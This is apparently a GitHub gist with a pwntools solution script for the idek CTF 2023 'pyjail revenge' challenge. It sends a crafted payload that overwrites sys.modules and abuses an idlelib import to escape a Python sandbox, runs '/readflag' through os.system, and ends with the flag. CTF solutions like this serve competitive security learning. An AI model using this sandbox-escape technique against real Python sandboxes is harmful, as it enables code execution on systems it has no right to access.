Skip to content

Instantly share code, notes, and snippets.

@lebr0nli
Last active January 15, 2023 22:07
Show Gist options
  • Save lebr0nli/1bc6aeca1a9067bb8b41154df81104e9 to your computer and use it in GitHub Desktop.
Save lebr0nli/1bc6aeca1a9067bb8b41154df81104e9 to your computer and use it in GitHub Desktop.
solution for idek CTF 2023 - pyjail revenge (Misc)
from pwn import *
def main() -> None:
io = remote("pyjail-revenge.chal.idek.team", 1337)
# __import__('__main__').any = all
# sys.modules = {'idlelib.pyshell': __import__('__main__')}
# import idlelib.idle
# https://github.com/python/cpython/blob/206f05a46b426eb374f724f8e7cd42f2f9643bb8/Lib/idlelib/idle.py#L13-L14
io.sendlineafter(
b">>> ",
b"setattr(__import__('__main__'),'any',all),setattr(copyright,'__dict__',dict(__main__=__import__('__main__'))),setattr(__import__('sys'),'modules',vars(copyright)),setattr(copyright,'idlelib'+chr(46)+'pyshell',__import__('__main__')),__import__('idlelib'+chr(46)+'idle')",
)
io.sendlineafter(b">>> ", b"__import__('os').system('/readflag giveflag')")
io.interactive()
if __name__ == "__main__":
main()
# idek{what_used_to_be_a_joke_has_now_turned_into_an_pyjail_escape.How_wonderful!}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment